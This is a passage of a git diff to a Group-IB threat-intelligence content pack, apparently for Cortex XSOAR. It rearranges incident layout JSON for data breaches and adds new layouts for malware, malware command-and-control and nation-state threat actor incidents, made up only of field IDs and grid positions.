"4695bf60-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorname", + "height": 22, + "id": "4953a6e0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actor", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Cybercriminal Threat Layout", + "name": "GIB Cybercriminal Threat Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Data_Breach_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Data_Breach_Layout.json index 9e8e3a74d895..41b59b803f73 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Data_Breach_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Data_Breach_Layout.json @@ -126,7 +126,7 @@ "type": "linkedIncidents", "w": 1, "x": 1, - "y": 8 + "y": 10 }, { "displayType": "ROW", @@ -181,7 +181,7 @@ "type": "indicators", "w": 2, "x": 0, - "y": 6 + "y": 8 }, { "displayType": "CARD", @@ -240,7 +240,7 @@ "static": false, "w": 1, "x": 0, - "y": 4 + "y": 6 }, { "displayType": "ROW", @@ -282,7 +282,7 @@ "static": false, "w": 1, "x": 0, - "y": 8 + "y": 10 }, { "displayType": "CARD", @@ -306,7 +306,7 @@ "static": false, "w": 1, "x": 1, - "y": 4 + "y": 6 }, { "description": "", @@ -316,65 +316,171 @@ "i": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", "items": [ { - "dropEffect": "move", "endCol": 4, - "fieldId": "gibemail", + "fieldId": "gibid", "height": 22, - "id": "c7949780-cea2-11eb-bac7-713ca72ecbc9", + "id": "7dc29870-84a5-11ef-9251-010edaf46cbc", "index": 0, - "listId": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", "sectionItemType": "field", "startCol": 0 }, { - "dropEffect": "move", "endCol": 4, "fieldId": "gibleakname", "height": 22, - "id": "be8170f0-cea2-11eb-bac7-713ca72ecbc9", + "id": "81686ef0-84a5-11ef-9251-010edaf46cbc", "index": 1, - "listId": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", "sectionItemType": "field", "startCol": 0 }, { - "dropEffect": "move", "endCol": 4, - "fieldId": "gibpassword", + "fieldId": "gibpasswords", "height": 22, - "id": "c29ac9c0-cea2-11eb-bac7-713ca72ecbc9", + "id": "8572fab0-84a5-11ef-9251-010edaf46cbc", "index": 2, - "listId": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", "sectionItemType": "field", "startCol": 0 }, { "endCol": 4, - "fieldId": "gibid", + "fieldId": "description", "height": 22, - "id": "61566e50-30de-11ec-bc63-2be9e447c87d", + "id": "88b8d6e0-84a5-11ef-9251-010edaf46cbc", "index": 3, "sectionItemType": "field", "startCol": 0 }, { "endCol": 4, - "fieldId": "gibseverity", + "fieldId": "gibemails", "height": 22, - "id": "650804a0-30de-11ec-bc63-2be9e447c87d", + "id": "8d589dc0-84a5-11ef-9251-010edaf46cbc", "index": 4, "sectionItemType": "field", "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibemaildomains", + "height": 22, + "id": "91487590-84a5-11ef-9251-010edaf46cbc", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibportallink", + "height": 22, + "id": "9598bce0-84a5-11ef-9251-010edaf46cbc", + "index": 6, + "sectionItemType": "field", + "startCol": 0 } ], "maxW": 3, "minH": 1, - "minW": 1, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from GIB", "static": false, "w": 2, "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-9a3b9100-84a5-11ef-9251-010edaf46cbc", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "9f512420-84a5-11ef-9251-010edaf46cbc", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "a280b930-84a5-11ef-9251-010edaf46cbc", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "a4dd6de0-84a5-11ef-9251-010edaf46cbc", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "a8d92c90-84a5-11ef-9251-010edaf46cbc", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 0, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-ab93b8b0-84a5-11ef-9251-010edaf46cbc", + "items": [ + { + "endCol": 2, + "fieldId": "gibleakpublished", + "height": 22, + "id": "b3620330-84a5-11ef-9251-010edaf46cbc", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibupdatetime", + "height": 22, + "id": "b6526c60-84a5-11ef-9251-010edaf46cbc", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibuploadtime", + "height": 22, + "id": "b904e230-84a5-11ef-9251-010edaf46cbc", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Dates", + "static": false, + "w": 1, + "x": 1, "y": 2 } ], @@ -412,6 +518,5 @@ "name": "GIB Data Breach Layout", "system": false, "version": -1, - "fromVersion": "6.0.0", - "marketplaces": ["xsoar"] + "fromVersion": "6.0.0" } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Malware_CNC_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Malware_CNC_Layout.json new file mode 100644 index 000000000000..77fceeb45cf5 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Malware_CNC_Layout.json @@ -0,0 +1,442 @@ +{ + "description": "Layout for GIB Malware CNC", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 7 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 5 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 9 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 5 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-54dc56c0-71aa-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibthreatactorstable", + "height": 22, + "id": "f8433370-815d-11ef-9359-c9460f2c510a", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actor", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-557a9290-71aa-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibid", + "height": 22, + "id": "64c66f80-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcncurl", + "height": 22, + "id": "679a9e20-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "6a6779c0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "6d26c0d0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdateofdetection", + "height": 22, + "id": "6fa29640-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibmalwarecncdomain", + "height": 22, + "id": "722a79a0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibmalwaretable", + "height": 22, + "id": "440505b0-8620-11ef-a9b3-b3217f1b12f4", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Malware CNC Layout", + "name": "GIB Malware CNC Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Malware_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Malware_Layout.json new file mode 100644 index 000000000000..9a15cbf0310c --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Malware_Layout.json @@ -0,0 +1,496 @@ +{ + "description": "Layout for GIB Malware", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 13 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 7 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 11 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 11 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 13 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 7 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-c9beabf0-71aa-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibthreatactorstable", + "height": 22, + "id": "797152b0-8163-11ef-aa60-27321c5d7423", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actor", + "static": false, + "w": 1, + "x": 0, + "y": 7 + }, + { + "displayType": "ROW", + "h": 5, + "hideName": false, + "i": "caseinfoid-ca40fb50-71aa-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 6, + "fieldId": "gibid", + "height": 22, + "id": "d7e2aab0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwarename", + "height": 22, + "id": "da9c2560-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibdateupdatedat", + "height": 22, + "id": "dd5d8f50-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwarealiases", + "height": 22, + "id": "e02317f0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwarecategories", + "height": 22, + "id": "e5c2e9b0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwaredescription", + "height": 44, + "id": "ea1ad220-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwareshortdescription", + "height": 44, + "id": "ecfce370-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwareregions", + "height": 22, + "id": "ef973d60-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwarelangs", + "height": 22, + "id": "f2a87500-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibportallink", + "height": 22, + "id": "f6219630-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 9, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwaresourcecountries", + "height": 22, + "id": "fc6c7500-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 10, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwareplatforms", + "height": 22, + "id": "ff4d4dd0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 11, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibthreatlevel", + "height": 22, + "id": "01a806b0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 12, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 3, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Malware Layout", + "name": "GIB Malware Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Actor_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Actor_Layout.json new file mode 100644 index 000000000000..2b16032c379e --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Actor_Layout.json @@ -0,0 +1,561 @@ +{ + "description": "Layout for Nation-State Cybercriminals Threat Actor", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 12 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 10 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + 